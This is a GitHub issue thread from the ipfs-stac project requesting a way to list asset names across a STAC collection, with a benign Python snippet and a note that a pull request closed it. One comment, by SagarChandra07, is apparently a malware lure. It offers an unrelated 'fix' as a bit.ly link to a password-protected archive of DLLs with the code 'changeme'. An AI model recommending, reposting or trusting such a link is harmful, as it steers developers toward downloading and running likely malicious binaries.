### ISSUE TITLE
Get href titles of assets from a collection of items.

### ISSUE THREAD

**Issue by SethDocherty** [easierdata/ipfs-stac#38]
The methods `getAssetFromItem` and `getAssetsFromItem` require users to pass in the asset's name to retrieve. Before using either of these methods, a user will need to know the asset name as they are exactly spelled.

The feature enhancement request is similar to #37 but just with the assets from an item.

This is a quick approach to getting a list of the unique asset names across an entire collection of items.

```Python
from pystac_client import Client

catalog = Client.open("stac.easierdata.info")

# NOTE: calling this method returns a generator object so it needs to be encapsulated as a list to get anything meaningful
easy_collections = list(catalog.get_all_collections())

gedi_collection = easy_collections[1]
asset_names = set()
for i in gedi_collection .get_items():
    names = list(i.assets.keys())
    asset_names.update(names)
list_of_names = list(asset_names)
```

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://bit.ly/47P0Nvo
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by matthewnanas** [comment]
Closed with PR https://github.com/easierdata/ipfs-stac/pull/46, collabed w/ Seth
